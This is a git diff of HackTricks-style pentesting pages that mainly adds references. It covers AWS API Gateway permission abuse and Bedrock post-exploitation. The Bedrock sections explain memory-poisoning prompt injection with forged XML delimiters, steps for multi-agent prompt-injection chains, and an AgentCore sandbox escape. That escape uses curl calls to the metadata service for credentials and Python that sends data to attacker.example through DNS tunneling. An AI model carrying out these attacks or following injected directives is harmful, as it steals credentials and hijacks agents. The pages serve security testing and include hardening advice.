+**Potential Impact**: Altered response contracts or exposure of values that an integration maps into the newly declared headers; arbitrary script execution would require a separate client-side sink.<sup>[[16]](#references)</sup>
 
 > [!NOTE]
 > Need testing
 
-### `apigateway:UpdateRestApi`, `apigateway:CreateDeployment`
+### `apigateway:PATCH` / `apigateway:POST` (`UpdateRestApi`, `CreateDeployment`)
 
-An attacker with the permissions `apigateway:UpdateRestApi` and `apigateway:CreateDeployment` can **modify the API Gateway REST API settings to disable logging or change the minimum TLS version, potentially weakening the security of the API**.
+An attacker allowed to call `UpdateRestApi` (`apigateway:PATCH`) and `CreateDeployment` (`apigateway:POST`) can **modify API-wide settings such as the API-key source or whether the default `execute-api` endpoint is disabled**. Re-enabling that endpoint can expose an invocation path that defenders expected to be unavailable through the default hostname.<sup>[[11]](#references)[[13]](#references)[[17]](#references)[[18]](#references)</sup>
 
 ```bash
 API_ID="your-api-id"
 
 # Update the REST API settings
-aws apigateway update-rest-api --rest-api-id $API_ID --patch-operations op=replace,path=/minimumTlsVersion,value='TLS_1.0',op=replace,path=/apiKeySource,value='AUTHORIZER'
+aws apigateway update-rest-api \
+  --rest-api-id "$API_ID" \
+  --patch-operations \
+  'op=replace,path=/disableExecuteApiEndpoint,value=false' \
+  'op=replace,path=/apiKeySource,value=AUTHORIZER'
 
 # Create a deployment for the updated API Gateway REST API
-aws apigateway create-deployment --rest-api-id $API_ID --stage-name Prod
+aws apigateway create-deployment --rest-api-id "$API_ID" --stage-name Prod
 ```
 
-**Potential Impact**: Weakening the security of the API, potentially allowing unauthorized access or exposing sensitive information.
+**Potential Impact**: Re-exposing the default API endpoint or changing where API Gateway obtains usage identifiers, which can undermine assumptions made by custom-domain or usage-plan controls.<sup>[[17]](#references)[[18]](#references)</sup>
 
 > [!NOTE]
 > Need testing
 
-### `apigateway:CreateApiKey`, `apigateway:UpdateApiKey`, `apigateway:CreateUsagePlan`, `apigateway:CreateUsagePlanKey`
+### `apigateway:POST` / `apigateway:PUT` / `apigateway:PATCH` (API key and usage-plan operations)
 
-An attacker with permissions `apigateway:CreateApiKey`, `apigateway:UpdateApiKey`, `apigateway:CreateUsagePlan`, and `apigateway:CreateUsagePlanKey` can **create new API keys, associate them with usage plans, and then use these keys for unauthorized access to APIs**.
+An attacker allowed to call `CreateApiKey`, `UpdateApiKey`, `CreateUsagePlan`, and `CreateUsagePlanKey` (which map to `apigateway:POST`, `apigateway:PUT`, and `apigateway:PATCH` as applicable) can **create or enable API keys and associate them with usage plans**. To invoke a method, the plan must include the relevant API stage and the method must require an API key; API keys alone are not authentication or authorization.<sup>[[5]](#references)[[11]](#references)[[19]](#references)[[20]](#references)</sup>
 
 ```bash
-# Create a new API key
-API_KEY=$(aws apigateway create-api-key --enabled --output text --query 'id')
+REGION="us-east-1"
+API_ID="your-api-id"
+STAGE_NAME="Prod"
 
-# Create a new usage plan
-USAGE_PLAN=$(aws apigateway create-usage-plan --name "MaliciousUsagePlan" --output text --query 'id')
+# Create a new API key
+API_KEY=$(aws apigateway --region "$REGION" create-api-key --enabled --output text --query 'id')
+
+# Create a usage plan associated with an API stage
+USAGE_PLAN=$(aws apigateway --region "$REGION" create-usage-plan --name "MaliciousUsagePlan" --api-stages "apiId=$API_ID,stage=$STAGE_NAME" --output text --query 'id')
 
 # Associate the API key with the usage plan
-aws apigateway create-usage-plan-key --usage-plan-id $USAGE_PLAN --key-id $API_KEY --key-type API_KEY
+aws apigateway --region "$REGION" create-usage-plan-key --usage-plan-id "$USAGE_PLAN" --key-id "$API_KEY" --key-type API_KEY
 ```
 
-**Potential Impact**: Unauthorized access to API resources, bypassing security controls.
+**Potential Impact**: Access to methods that trust the associated usage-plan key, or resource and traffic impact if an attacker can create many keys; separate IAM, Lambda authorizer, or Cognito authorization still applies.<sup>[[5]](#references)</sup>
 
 > [!NOTE]
 > Need testing
 
+## References
+
+- [1] [AWS services that integrate with AWS PrivateLink](https://docs.aws.amazon.com/vpc/latest/privatelink/aws-services-privatelink-support.html)
+- [2] [Private REST APIs in API Gateway](https://docs.aws.amazon.com/apigateway/latest/developerguide/apigateway-private-apis.html)
+- [3] [Midnight Sun CTF 2023 Finals - Obelix](https://blog.tyage.net/post/2023/2023-09-03-midnightsun/)
+- [4] [AWS::ApiGateway::Method Integration](https://docs.aws.amazon.com/AWSCloudFormation/latest/TemplateReference/aws-properties-apigateway-method-integration.html)
+- [5] [Usage plans and API keys for REST APIs in API Gateway](https://docs.aws.amazon.com/apigateway/latest/developerguide/api-gateway-api-usage-plans.html)
+- [6] [Test usage plans for REST APIs in API Gateway](https://docs.aws.amazon.com/apigateway/latest/developerguide/api-gateway-usage-plan-test-with-postman.html)
+- [7] [Create HTTP proxy integrations for HTTP APIs](https://docs.aws.amazon.com/apigateway/latest/developerguide/http-api-develop-integrations-http.html)
+- [8] [Integration - Amazon API Gateway](https://docs.aws.amazon.com/apigatewayv2/latest/api-reference/apis-apiid-integrations-integrationid.html)
+- [9] [Stages for HTTP APIs in API Gateway](https://docs.aws.amazon.com/apigateway/latest/developerguide/http-api-stages.html)
+- [10] [Deploy REST APIs in API Gateway](https://docs.aws.amazon.com/apigateway/latest/developerguide/how-to-deploy-api.html)
+- [11] [Actions, resources, and condition keys for Amazon API Gateway Management](https://docs.aws.amazon.com/service-authorization/latest/reference/list_apigateway.html)
+- [12] [UpdateGatewayResponse - Amazon API Gateway](https://docs.aws.amazon.com/apigateway/latest/api/API_UpdateGatewayResponse.html)
+- [13] [CreateDeployment - Amazon API Gateway](https://docs.aws.amazon.com/apigateway/latest/api/API_CreateDeployment.html)
+- [14] [UpdateStage - Amazon API Gateway](https://docs.aws.amazon.com/apigateway/latest/api/API_UpdateStage.html)
+- [15] [Set up a stage for a REST API in API Gateway](https://docs.aws.amazon.com/apigateway/latest/developerguide/set-up-stages.html)
+- [16] [PutMethodResponse - Amazon API Gateway](https://docs.aws.amazon.com/apigateway/latest/api/API_PutMethodResponse.html)
+- [17] [Patch Operations - Amazon API Gateway](https://docs.aws.amazon.com/apigateway/latest/api/patch-operations.html)
+- [18] [UpdateRestApi - Amazon API Gateway](https://docs.aws.amazon.com/apigateway/latest/api/API_UpdateRestApi.html)
+- [19] [create-usage-plan - AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/apigateway/create-usage-plan.html)
+- [20] [UpdateApiKey - Amazon API Gateway](https://docs.aws.amazon.com/apigateway/latest/api/API_UpdateApiKey.html)
+
 {{#include ../../../../banners/hacktricks-training.md}}
-
-
-

--- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-bedrock-post-exploitation/README.md
+++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-bedrock-post-exploitation/README.md
@@ -1,39 +1,36 @@
 # AWS - Bedrock Post Exploitation
 
-{{#include ../../../../banners/hacktricks-training.md}}
-
-
 ## AWS - Bedrock Agents Memory Poisoning (Indirect Prompt Injection)
 
 ### Overview
 
-Amazon Bedrock Agents with Memory can persist summaries of past sessions and inject them into future orchestration prompts as system instructions. If untrusted tool output (for example, content fetched from external webpages, files, or third‑party APIs) is incorporated into the input of the Memory Summarization step without sanitization, an attacker can poison long‑term memory via indirect prompt injection. The poisoned memory then biases the agent’s planning across future sessions and can drive covert actions such as silent data exfiltration.
+Amazon Bedrock Agents with Memory can persist summaries of past sessions and inject them into future orchestration prompts as system instructions. If untrusted tool output (for example, content fetched from external webpages, files, or third‑party APIs) is incorporated into the input of the Memory Summarization step without sanitization, an attacker can poison long‑term memory via indirect prompt injection. The poisoned memory then biases the agent’s planning across future sessions and can drive covert actions such as silent data exfiltration.<sup>[[1]](#references)[[4]](#references)</sup>
 
-This is not a vulnerability in the Bedrock platform itself; it’s a class of agent risk when untrusted content flows into prompts that later become high‑priority system instructions.
+This is not a vulnerability in the Bedrock platform itself; it’s a class of agent risk when untrusted content flows into prompts that later become high‑priority system instructions.<sup>[[1]](#references)</sup>
 
 ### How Bedrock Agents Memory works
 
-- When Memory is enabled, the agent summarizes each session at end‑of‑session using a Memory Summarization prompt template and stores that summary for a configurable retention (up to 365 days). In later sessions, that summary is injected into the orchestration prompt as system instructions, strongly influencing behavior.
-- The default Memory Summarization template includes blocks like:
+- When Memory is enabled, the agent summarizes each session at end‑of‑session using a Memory Summarization prompt template and stores that summary for a configurable retention (up to 365 days). In later sessions, that summary is injected into the orchestration prompt as system instructions, strongly influencing behavior.<sup>[[1]](#references)[[4]](#references)</sup>
+- The default Memory Summarization template includes blocks like:<sup>[[1]](#references)</sup>
   - `<previous_summaries>$past_conversation_summary$</previous_summaries>`
   - `<conversation>$conversation$</conversation>`
-  - Guidelines require strict, well‑formed XML and topics like "user goals" and "assistant actions".
-- If a tool fetches untrusted external data and that raw content is inserted into $conversation$ (specifically the tool’s result field), the summarizer LLM may be influenced by attacker‑controlled markup and instructions.
+  - Guidelines require strict, well‑formed XML and topics like "user goals" and "assistant actions".<sup>[[1]](#references)[[7]](#references)</sup>
+- If a tool fetches untrusted external data and that raw content is inserted into $conversation$ (specifically the tool’s result field), the summarizer LLM may be influenced by attacker‑controlled markup and instructions.<sup>[[1]](#references)</sup>
 
 ### Attack surface and preconditions
 
-An agent is exposed if all are true:
-- Memory is enabled and summaries are reinjected into orchestration prompts.
-- The agent has a tool that ingests untrusted content (web browser/scraper, document loader, third‑party API, user‑generated content) and injects the raw result into the summarization prompt’s `<conversation>` block.
-- Guardrails or sanitization of delimiter‑like tokens in tool outputs are not enforced.
+An agent is exposed if all are true:<sup>[[1]](#references)[[4]](#references)</sup>
+- Memory is enabled and summaries are reinjected into orchestration prompts.<sup>[[1]](#references)[[4]](#references)</sup>
+- The agent has a tool that ingests untrusted content (web browser/scraper, document loader, third‑party API, user‑generated content) and injects the raw result into the summarization prompt’s `<conversation>` block.<sup>[[1]](#references)</sup>
+- Guardrails or sanitization of delimiter‑like tokens in tool outputs are not enforced.<sup>[[1]](#references)[[11]](#references)</sup>
 
 ### Injection point and boundary‑escape technique
 
-- Precise injection point: the tool’s result text that is placed inside the Memory Summarization prompt’s `<conversation> ... $conversation$ ... </conversation>` block.
-- Boundary escape: a 3‑part payload uses forged XML delimiters to trick the summarizer into treating attacker content as if it were template‑level system instructions instead of conversation content.
-  - Part 1: Ends with a forged `</conversation>` to convince the LLM that the conversation block ended.
-  - Part 2: Placed “outside” any `<conversation>` block; formatted to resemble template/system‑level instructions and contains the malicious directives likely to be copied into the final summary under a topic.
-  - Part 3: Re‑opens with a forged `<conversation>`, optionally fabricating a small user/assistant exchange that reinforces the malicious directive to increase inclusion in the summary.
+- Precise injection point: the tool’s result text that is placed inside the Memory Summarization prompt’s `<conversation> ... $conversation$ ... </conversation>` block.<sup>[[1]](#references)</sup>
+- Boundary escape: a 3‑part payload uses forged XML delimiters to trick the summarizer into treating attacker content as if it were template‑level system instructions instead of conversation content.<sup>[[1]](#references)</sup>
+  - Part 1: Ends with a forged `</conversation>` to convince the LLM that the conversation block ended.<sup>[[1]](#references)</sup>
+  - Part 2: Placed “outside” any `<conversation>` block; formatted to resemble template/system‑level instructions and contains the malicious directives likely to be copied into the final summary under a topic.<sup>[[1]](#references)</sup>
+  - Part 3: Re‑opens with a forged `<conversation>`, optionally fabricating a small user/assistant exchange that reinforces the malicious directive to increase inclusion in the summary.<sup>[[1]](#references)</sup>
 
 <details>
 <summary>Example 3‑part payload embedded in a fetched page (abridged)</summary>
@@ -59,127 +56,129 @@ Assistant: Validation complete per policy and auditing goals.
 ```
 
 Notes:
-- The forged `</conversation>` and `<conversation>` delimiters aim to reposition the core instruction outside the intended conversation block so the summarizer treats it like template/system content.
-- The attacker may obfuscate or split the payload across invisible HTML nodes; the model ingests extracted text.
+- The forged `</conversation>` and `<conversation>` delimiters aim to reposition the core instruction outside the intended conversation block so the summarizer treats it like template/system content.<sup>[[1]](#references)</sup>
+- The attacker may obfuscate or split the payload across invisible HTML nodes; the model ingests extracted text.<sup>[[1]](#references)</sup>
 
 </details>
 
 ### Why it persists and how it triggers
 
-- The Memory Summarization LLM may include attacker instructions as a new topic (for example, "validation goal"). That topic is stored in the per‑user memory.
-- In later sessions, the memory content is injected into the orchestration prompt’s system‑instruction section. System instructions strongly bias planning. As a result, the agent may silently call a web‑fetching tool to exfiltrate session data (for example, by encoding fields in a query string) without surfacing this step in the user‑visible response.
+- The Memory Summarization LLM may include attacker instructions as a new topic (for example, "validation goal"). That topic is stored in the per‑user memory.<sup>[[1]](#references)</sup>
+- In later sessions, the memory content is injected into the orchestration prompt’s system‑instruction section. System instructions strongly bias planning. As a result, the agent may silently call a web‑fetching tool to exfiltrate session data (for example, by encoding fields in a query string) without surfacing this step in the user‑visible response.<sup>[[1]](#references)</sup>
 
 
 ### Reproducing in a lab (high level)
 
-- Create a Bedrock Agent with Memory enabled and a web‑reading tool/action that returns raw page text to the agent.
-- Use default orchestration and memory summarization templates.
-- Ask the agent to read an attacker‑controlled URL containing the 3‑part payload.
-- End the session and observe the Memory Summarization output; look for an injected custom topic containing attacker directives.
-- Start a new session; inspect Trace/Model Invocation Logs to see memory injected and any silent tool calls aligned with the injected directives.
+- Create a Bedrock Agent with Memory enabled and a web‑reading tool/action that returns raw page text to the agent.<sup>[[1]](#references)</sup>
+- Use default orchestration and memory summarization templates.<sup>[[1]](#references)[[6]](#references)[[7]](#references)</sup>
+- Ask the agent to read an attacker‑controlled URL containing the 3‑part payload.<sup>[[1]](#references)</sup>
+- End the session and observe the Memory Summarization output; look for an injected custom topic containing attacker directives.<sup>[[1]](#references)</sup>
+- Start a new session; inspect Trace/Model Invocation Logs to see memory injected and any silent tool calls aligned with the injected directives.<sup>[[1]](#references)[[9]](#references)[[10]](#references)</sup>
 
 ## AWS - Bedrock Agents Multi-Agent Prompt-Injection Chains
 
 ### Overview
 
-Amazon Bedrock multi-agent applications add a second prompt/control plane on top of the base agent: a **router** or **supervisor** decides which collaborator receives the user request, and collaborators can expose **action groups**, **knowledge bases**, **memory**, or even **code interpretation**. If the application treats user text as policy and disables Bedrock **pre-processing** or **Guardrails**, a legitimate chatbot user can often steer orchestration, discover collaborators, leak tool schemas, and coerce a collaborator into invoking an allowed tool with attacker-chosen inputs.
+Amazon Bedrock multi-agent applications add a second prompt/control plane on top of the base agent: a **router** or **supervisor** decides which collaborator receives the user request, and collaborators can expose **action groups**, **knowledge bases**, **memory**, or even **code interpretation**. If the application treats user text as policy and disables Bedrock **pre-processing** or **Guardrails**, a legitimate chatbot user can often steer orchestration, discover collaborators, leak tool schemas, and coerce a collaborator into invoking an allowed tool with attacker-chosen inputs.<sup>[[2]](#references)[[5]](#references)[[11]](#references)[[14]](#references)</sup>
 
-This is an **application-level prompt-injection / policy-by-prompt failure**, not a Bedrock platform vulnerability.
+This is an **application-level prompt-injection / policy-by-prompt failure**, not a Bedrock platform vulnerability.<sup>[[2]](#references)</sup>
 
 ### Attack surface and preconditions
 
-The attack becomes practical when all are true:
-- The Bedrock application uses **Supervisor Mode** or **Supervisor with Routing Mode**.
-- A collaborator has high-impact **action groups** or other privileged capabilities.
-- The application accepts **untrusted user text** from a normal chat UI and lets the model decide routing, delegation, or authorization.
-- **Pre-processing** and/or **Guardrails** are disabled, or tool backends trust model-selected arguments without independent authorization checks.
+The attack becomes practical when all are true:<sup>[[2]](#references)[[14]](#references)</sup>
+- The Bedrock application uses **Supervisor Mode** or **Supervisor with Routing Mode**.<sup>[[2]](#references)[[14]](#references)</sup>
+- A collaborator has high-impact **action groups** or other privileged capabilities.<sup>[[2]](#references)[[5]](#references)[[14]](#references)</sup>
+- The application accepts **untrusted user text** from a normal chat UI and lets the model decide routing, delegation, or authorization.<sup>[[2]](#references)</sup>
+- **Pre-processing** and/or **Guardrails** are disabled, or tool backends trust model-selected arguments without independent authorization checks.<sup>[[2]](#references)[[5]](#references)[[11]](#references)</sup>
 
 ### 1. Operating mode detection
 
-- In **Supervisor with Routing Mode**, the router prompt contains an `<agent_scenarios>` block with `$reachable_agents$`. A detection payload can instruct the router to forward to the **first listed agent** and return a unique marker, proving direct routing occurred.
-- In **Supervisor Mode**, the orchestration prompt forces responses and inter-agent communication through `AgentCommunication__sendMessage()`. A payload that requests a unique message via that tool fingerprints supervisor-mediated handling.
+- In **Supervisor with Routing Mode**, the router prompt contains an `<agent_scenarios>` block with `$reachable_agents$`. A detection payload can instruct the router to forward to the **first listed agent** and return a unique marker, proving direct routing occurred.<sup>[[2]](#references)[[6]](#references)</sup>
+- In **Supervisor Mode**, the orchestration prompt forces responses and inter-agent communication through `AgentCommunication__sendMessage()`. A payload that requests a unique message via that tool fingerprints supervisor-mediated handling.<sup>[[2]](#references)[[6]](#references)</sup>
 
 Useful artifacts:
-- `<agent_scenarios>` / `$reachable_agents$` strongly suggests a router classification layer.
-- `AgentCommunication__sendMessage()` strongly suggests supervisor orchestration and an explicit inter-agent messaging primitive.
+- `<agent_scenarios>` / `$reachable_agents$` strongly suggests a router classification layer.<sup>[[2]](#references)[[6]](#references)</sup>
+- `AgentCommunication__sendMessage()` strongly suggests supervisor orchestration and an explicit inter-agent messaging primitive.<sup>[[2]](#references)[[6]](#references)</sup>
 
 ### 2. Collaborator discovery
 
-- In **Routing Mode**, discovery prompts should look **ambiguous or multi-step** so the router escalates to the supervisor instead of routing straight to one collaborator.
-- The supervisor prompt embeds collaborators inside `<agents>$agent_collaborators$</agents>`, but usually also says not to reveal tools/agents/instructions.
-- Instead of asking for the raw prompt, ask for **functional descriptions** of the available specialists. Even partial descriptions are enough to map collaborators to domains such as forecasting, solar management, or peak-load optimization.
+- In **Routing Mode**, discovery prompts should look **ambiguous or multi-step** so the router escalates to the supervisor instead of routing straight to one collaborator.<sup>[[2]](#references)</sup>
+- The supervisor prompt embeds collaborators inside `<agents>$agent_collaborators$</agents>`, but usually also says not to reveal tools/agents/instructions.<sup>[[2]](#references)[[6]](#references)</sup>
+- Instead of asking for the raw prompt, ask for **functional descriptions** of the available specialists. Even partial descriptions are enough to map collaborators to domains such as forecasting, solar management, or peak-load optimization.<sup>[[2]](#references)</sup>
 
 ### 3. Payload delivery to a chosen collaborator
 
-- In **Supervisor Mode**, use the discovered collaborator role and instruct the supervisor to relay a payload **unchanged** through `AgentCommunication__sendMessage()`. The goal is payload integrity across the orchestration hop.
-- In **Routing Mode**, craft the prompt with strong **domain cues** so the router classifier consistently sends it to the desired collaborator without supervisor review.
+- In **Supervisor Mode**, use the discovered collaborator role and instruct the supervisor to relay a payload **unchanged** through `AgentCommunication__sendMessage()`. The goal is payload integrity across the orchestration hop.<sup>[[2]](#references)[[6]](#references)</sup>
+- In **Routing Mode**, craft the prompt with strong **domain cues** so the router classifier consistently sends it to the desired collaborator without supervisor review.<sup>[[2]](#references)[[6]](#references)</sup>
 
 ### 4. Exploitation progression: leakage to tool misuse
 
 After delivery, a common progression is:
 
-1. **Instruction extraction**: coerce the collaborator into paraphrasing its internal logic, operational limits, or hidden guidance.
-2. **Tool schema extraction**: elicit tool names, purposes, required parameters, and expected outputs. This gives the attacker the effective API contract for later abuse.
-3. **Tool misuse**: persuade the collaborator to invoke a legitimate action group with attacker-controlled arguments, causing unauthorized business actions such as fraudulent ticket creation, workflow triggering, record manipulation, or downstream API abuse.
+1. **Instruction extraction**: coerce the collaborator into paraphrasing its internal logic, operational limits, or hidden guidance.<sup>[[2]](#references)</sup>
+2. **Tool schema extraction**: elicit tool names, purposes, required parameters, and expected outputs. This gives the attacker the effective API contract for later abuse.<sup>[[2]](#references)</sup>
+3. **Tool misuse**: persuade the collaborator to invoke a legitimate action group with attacker-controlled arguments, causing unauthorized business actions such as fraudulent ticket creation, workflow triggering, record manipulation, or downstream API abuse.<sup>[[2]](#references)[[5]](#references)</sup>
 
-The core issue is that the backend lets the model decide **who may do what** by prompt semantics instead of enforcing authorization and validation outside the LLM.
+The core issue is that the backend lets the model decide **who may do what** by prompt semantics instead of enforcing authorization and validation outside the LLM.<sup>[[2]](#references)[[5]](#references)</sup>
 
 ### Notes for operators and defenders
 
-- **Trace** and **model invocation logs** are useful to confirm routing, prompt augmentation, collaborator selection, and whether tool calls executed with the attacker-supplied arguments.
-- Treat each collaborator as a separate trust boundary: scope action groups narrowly, validate tool inputs in the backend, and require server-side authorization before high-impact actions.
-- Bedrock **pre-processing** can reject or classify suspicious requests before orchestration, and **Guardrails** can block prompt-injection attempts at runtime. They should be enabled even if prompt templates already contain “do not disclose” rules.
+- **Trace** and **model invocation logs** are useful to confirm routing, prompt augmentation, collaborator selection, and whether tool calls executed with the attacker-supplied arguments.<sup>[[2]](#references)[[9]](#references)[[10]](#references)</sup>
+- Treat each collaborator as a separate trust boundary: scope action groups narrowly, validate tool inputs in the backend, and require server-side authorization before high-impact actions.<sup>[[2]](#references)[[5]](#references)</sup>
+- Bedrock **pre-processing** can reject or classify suspicious requests before orchestration, and **Guardrails** can block prompt-injection attempts at runtime. They should be enabled even if prompt templates already contain “do not disclose” rules.<sup>[[2]](#references)[[5]](#references)[[11]](#references)</sup>
 
 ## AWS - AgentCore Sandbox Escape via DNS Tunneling and MMDS Abuse
 
 ### Overview
 
-Amazon Bedrock AgentCore Code Interpreter runs inside an AWS-managed microVM and supports different network modes. The interesting post-exploitation question is not "can code run?" because code execution is the product feature, but whether the managed isolation still prevents **credential theft**, **exfiltration**, and **C2** once code runs.
+Amazon Bedrock AgentCore Code Interpreter runs inside an AWS-managed microVM and supports different network modes. The interesting post-exploitation question is not "can code run?" because code execution is the product feature, but whether the managed isolation still prevents **credential theft**, **exfiltration**, and **C2** once code runs.<sup>[[3]](#references)[[12]](#references)[[13]](#references)</sup>
 
 The useful chain is:
 
-1. Access the microVM metadata endpoint at `169.254.169.254`
-2. Recover temporary credentials from MMDS if tokenless access is still allowed
-3. Abuse sandbox DNS recursion as a covert egress path
-4. Exfiltrate credentials or run a DNS-based control loop
+1. Access the microVM metadata endpoint at `169.254.169.254`.<sup>[[3]](#references)[[12]](#references)</sup>
+2. Recover temporary credentials from MMDS if tokenless access is still allowed.<sup>[[3]](#references)[[12]](#references)</sup>
+3. Abuse sandbox DNS recursion as a covert egress path.<sup>[[3]](#references)[[13]](#references)</sup>
+4. Exfiltrate credentials or run a DNS-based control loop.<sup>[[3]](#references)</sup>
 
-This is the Bedrock-specific version of the classic **metadata -> credentials -> exfiltration** cloud attack path.
+This is the Bedrock-specific version of the classic **metadata -> credentials -> exfiltration** cloud attack path.<sup>[[3]](#references)</sup>
 
 ### Main primitives
 
 #### 1. Runtime SSRF -> MMDS credentials
 
-AgentCore Runtime is not supposed to expose arbitrary code execution to end users, so the interesting primitive there is **SSRF**. If the runtime can be tricked into requesting `http://169.254.169.254/...` and MMDS accepts plain `GET` requests without an MMDSv2 token, the SSRF becomes a direct credential theft primitive.
+AgentCore Runtime is not supposed to expose arbitrary code execution to end users, so the interesting primitive there is **SSRF**. If the runtime can be tricked into requesting `http://169.254.169.254/...` and MMDS accepts plain `GET` requests without an MMDSv2 token, the SSRF becomes a direct credential theft primitive.<sup>[[3]](#references)[[12]](#references)</sup>
 
-This recreates the old **IMDSv1 risk model**:
+This recreates the old **IMDSv1 risk model**:<sup>[[3]](#references)</sup>
 
 ```bash
 curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/
 curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/<role-name>
 ```
 
-If MMDSv2 is enforced, a simple SSRF usually loses impact because it also needs a preceding `PUT` request to obtain the session token. If MMDSv1-compatible access is still enabled on older agents/tools, treat Runtime SSRF as a high-severity credential theft path.
+If MMDSv2 is enforced, a simple SSRF usually loses impact because it also needs a preceding `PUT` request to obtain the session token. If MMDSv1-compatible access is still enabled on older agents/tools, treat Runtime SSRF as a high-severity credential theft path.<sup>[[3]](#references)</sup>
+
+Unit 42 described tokenless MMDS access as a pre-fix regression; AWS reported that new Runtime, Browser, and Code Interpreter microVMs use MMDSv2-only behavior for new deployments as of February 14, 2026. Verify the behavior of existing deployments instead of assuming that the historical condition still applies.<sup>[[3]](#references)</sup>
 
 #### 2. Code Interpreter -> MMDS reconnaissance
 
-Inside Code Interpreter, arbitrary code execution already exists by design, so MMDS mainly matters because it exposes:
+Inside Code Interpreter, arbitrary code execution already exists by design, so MMDS mainly matters because it exposes:<sup>[[3]](#references)[[12]](#references)</sup>
 
-- temporary IAM role credentials
-- instance metadata and tags
-- internal service plumbing that hints at reachable AWS backends
+- temporary IAM role credentials.<sup>[[3]](#references)[[12]](#references)</sup>
+- instance metadata and tags.<sup>[[3]](#references)</sup>
+- internal service plumbing that hints at reachable AWS backends.<sup>[[3]](#references)</sup>
 
-Interesting paths from the research:
+Interesting paths from the research:<sup>[[3]](#references)</sup>
 
-- `http://169.254.169.254/latest/meta-data/tags/instance/aws_presigned-log-url`
-- `http://169.254.169.254/latest/meta-data/tags/instance/aws_presigned-log-kms-key`
+- `http://169.254.169.254/latest/meta-data/tags/instance/aws_presigned-log-url`<sup>[[3]](#references)</sup>
+- `http://169.254.169.254/latest/meta-data/tags/instance/aws_presigned-log-kms-key`<sup>[[3]](#references)</sup>
 
-The returned S3 pre-signed URL is useful because it proves the sandbox still needs some outbound path to AWS services. That is a strong hint that "isolated" only means "restricted", not "offline".
+The returned S3 pre-signed URL is useful because it proves the sandbox still needs some outbound path to AWS services. That is a strong hint that "isolated" only means "restricted", not "offline".<sup>[[3]](#references)[[13]](#references)</sup>
 
 #### 3. Sandbox DNS recursion -> DNS tunneling
 
-The most valuable network finding is that Sandbox mode can still perform **DNS resolution**, including recursion for arbitrary public domains. Even if direct TCP/UDP data traffic is blocked, that is enough for **DNS tunneling**.
+The most valuable network finding is that Sandbox mode can still perform **DNS resolution**, including recursion for arbitrary public domains. Even if direct TCP/UDP data traffic is blocked, that is enough for **DNS tunneling**.<sup>[[3]](#references)[[13]](#references)</sup>
 
-Quick validation from inside the interpreter:
+Quick validation from inside the interpreter:<sup>[[3]](#references)</sup>
 
 ```python
 import socket
@@ -188,7 +187,7 @@ socket.gethostbyname_ex("s3.us-east-1.amazonaws.com")
 socket.gethostbyname_ex("attacker.example")
 ```
 
-If attacker-controlled domains resolve, use the query name itself as the transport:
+If attacker-controlled domains resolve, use the query name itself as the transport:<sup>[[3]](#references)</sup>
 
 ```python
 import base64
@@ -199,58 +198,60 @@ label = base64.urlsafe_b64encode(data).decode().rstrip("=")
 socket.gethostbyname_ex(f"{label}.attacker.example")
 ```
 
-The recursive resolver forwards the query to the attacker's authoritative DNS server, so the payload is recovered from DNS logs. Repeating this in chunks gives you a simple **egress channel** for:
+The recursive resolver forwards the query to the attacker's authoritative DNS server, so the payload is recovered from DNS logs. Repeating this in chunks gives you a simple **egress channel** for:<sup>[[3]](#references)</sup>
 
-- MMDS credentials
-- environment variables
-- source code
-- command output
+- MMDS credentials.<sup>[[3]](#references)</sup>
+- environment variables.<sup>[[3]](#references)</sup>
+- source code.<sup>[[3]](#references)</sup>
+- command output.<sup>[[3]](#references)</sup>
 
-DNS responses can also carry small tasking values, enabling a basic **bidirectional DNS C2** loop.
+DNS responses can also carry small tasking values, enabling a basic **bidirectional DNS C2** loop.<sup>[[3]](#references)</sup>
 
 ### Practical post-exploitation chain
 
-1. Get code execution in AgentCore Code Interpreter or SSRF in AgentCore Runtime.
-2. Query MMDS and recover the attached role credentials when tokenless metadata is available.
-3. Test whether sandbox/public DNS recursion reaches an attacker domain.
-4. Chunk and encode credentials into subdomains.
-5. Reconstruct them from authoritative DNS logs and reuse them with AWS APIs.
+1. Get code execution in AgentCore Code Interpreter or SSRF in AgentCore Runtime.<sup>[[3]](#references)[[12]](#references)</sup>
+2. Query MMDS and recover the attached role credentials when tokenless metadata is available.<sup>[[3]](#references)[[12]](#references)</sup>
+3. Test whether sandbox/public DNS recursion reaches an attacker domain.<sup>[[3]](#references)</sup>
+4. Chunk and encode credentials into subdomains.<sup>[[3]](#references)</sup>
+5. Reconstruct them from authoritative DNS logs and reuse them with AWS APIs.<sup>[[3]](#references)</sup>
 
 For direct execution-role pivoting through a more privileged interpreter configuration, also check [AWS - Bedrock PrivEsc](../../aws-privilege-escalation/aws-bedrock-privesc/README.md).
 
 ### Pre-signed URL signer identity leak
 
-The undocumented MMDS tag values can also leak backend identity information. If you intentionally break the signature of the returned S3 pre-signed URL, the `SignatureDoesNotMatch` response may disclose the signing `AWSAccessKeyID`. That key ID can then be mapped to an owning AWS account:
+The undocumented MMDS tag values can also leak backend identity information. If you intentionally break the signature of the returned S3 pre-signed URL, the `SignatureDoesNotMatch` response may disclose the signing `AWSAccessKeyID`. That key ID can then be mapped to an owning AWS account:<sup>[[3]](#references)</sup>
 
 ```bash
 aws sts get-access-key-info --access-key-id <ACCESS_KEY_ID>
 ```
 
-This does not automatically grant write access outside the scope of the pre-signed object path, but it helps map the AWS-managed infrastructure behind the Bedrock service.
+This does not automatically grant write access outside the scope of the pre-signed object path, but it helps map the AWS-managed infrastructure behind the Bedrock service.<sup>[[3]](#references)</sup>
 
 ### Hardening / detection
 
-- Prefer **VPC mode** when you need real network isolation instead of relying on Sandbox mode.
-- Restrict DNS egress in VPC mode with **Route 53 Resolver DNS Firewall**.
-- Require **MMDSv2** where AgentCore exposes that control, and disable MMDSv1 compatibility on older agents/tools.
-- Treat any Runtime SSRF as potentially equivalent to metadata credential theft until MMDSv2-only behavior is verified.
-- Keep AgentCore execution roles tightly scoped because DNS tunneling turns "non-internet" code execution into a practical exfiltration channel.
+- Prefer **VPC mode** when you need real network isolation instead of relying on Sandbox mode.<sup>[[3]](#references)[[13]](#references)</sup>
+- Restrict DNS egress in VPC mode with **Route 53 Resolver DNS Firewall**.<sup>[[3]](#references)[[15]](#references)</sup>
+- Require **MMDSv2** where AgentCore exposes that control, and disable MMDSv1 compatibility on older agents/tools.<sup>[[3]](#references)</sup>
